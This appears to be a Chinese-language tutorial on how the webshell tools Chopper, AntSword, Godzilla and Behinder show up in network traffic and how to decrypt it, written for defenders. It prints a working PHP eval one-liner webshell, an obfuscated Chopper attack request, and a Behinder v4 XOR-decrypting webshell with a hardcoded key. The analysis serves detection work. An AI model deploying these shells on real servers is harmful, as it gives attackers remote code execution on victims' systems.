黑客 Webshell 工具流量特征&解密,零基础入门到精通，收藏这篇就够了

实验环境：

主机名	IP	账号	环境
win10	内网	A01	PHPstudy

php一句话木马

<?php @eval($_POST['cmd']); ?>

菜刀

菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。支持动态脚本

‍

流量分析

POST /cd.php HTTP/1.1``Referer: http://192.168.1.101``Content-Type: application/x-www-form-urlencoded``User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)``Host: 192.168.1.101``Content-Length: 804``Cache-Control: no-cache``   ``cmd=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0I6XFwxM19waHBzdHVkeV9wcm9cXFdXV1xcZXJyb3JcXCc7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELicvJy4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iXG4iO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));\");"));HTTP/1.1 200 OK``Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02``X-Powered-By: PHP/5.6.9``Transfer-Encoding: chunked``Content-Type: text/html; charset=UTF-8

参数流量层解密

这段 PHP 代码主要进行了错误显示关闭、脚本执行时间无限制设置，对于 PHP 版本小于 5.3.0 的情况关闭魔术引号运行时设置，然后尝试打开指定目录并读取其中文件和子目录的信息并输出，最后输出特定字符串后终止脚本。

蚁剑

流量分析

POST /ant.php HTTP/1.1``Host: 192.168.1.101``Accept-Encoding: gzip, deflate``User-Agent: Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11``Content-Type: application/x-www-form-urlencoded``Content-Length: 4889``Connection: close``ant=XXX //太多就不填写了，看以下图片

参数流量层解密

这段代码看起来是一段具有恶意意图的 PHP 脚本，它通过一系列复杂操作试图绕过服务器的安全限制（如关闭错误显示、突破 open_basedir 限制等），并根据 POST 请求传入的内容执行命令，同时对输出进行处理后返回。

godzilla

哥斯拉加密流程如下：

在客户端生成 shell 时可设置参数，包括作为 Post 请求参数名且用于加密运算的密码、其 md5 值取前 16 位用于加密请求数据的密钥、有 ASP 等四种类型的有效载荷、base64 等三大类加密器，还有用于自定义 HTTP 请求头和在请求数据前后追加以降低流量特征的扰乱数据。

**流量分析
**

POST /shell.php HTTP/1.1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8``Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2``Host: 192.168.1.102``Connection: keep-alive``Content-type: application/x-www-form-urlencoded``Content-Length: 53767``//太多就不展示了

利用蓝队分析研判工具箱解密

behinder4

冰蝎通信含密钥协商与加密传输两阶段。协商时，攻击者发请求求密钥，服务器生成并返回。传输中，客户端加密命令发送，服务端解密执行后再加密结果返回。

冰蝎 v3.0 与 v4.0 存在明显区别，体现在加密相关处理上。在 v3.0 版本中，会将生成的 key 作为 session 传入，即执行 $\_SESSION\['k'\] = $key 操作。`而到了 v4.0 版本，情况有所不同。首先会判断服务端是否存在 openssl 拓展，这通过 extension_loaded 函数来实现。若服务端不存在 openssl 拓展，那么会采用一种特定的加密方式，也就是先对数据进行 base64 解码，之后再使用 key 进行异或加密，此即为 v4.0 版本中的 xor_base64 加密方式。``倘若服务端能够成功加载 openssl 拓展，此时则会使用 AES128 进行解密操作，这对应的正是冰蝎 v4.0 版本里的 aes 加密方式。`

<?php``@error_reporting(0);`  `function decrypt($data)``{`    `$key="25f9e794323b4538";``    $bs="base64_"."decode";`  `$after=$bs($data."");`  `for($i=0;$i<strlen($after);$i++) {`      `$after[$i] = $after[$i]^$key[$i+1&15];``    }`    `return $after;``}`  `$post=Decrypt(file_get_contents("php://input"));`    `eval($post);``?>

这里的 key 就是对应的连接密码，当然在冰蝎“传输协议”当中，可以自定义密码。

流量解密

直接使用YK插件解密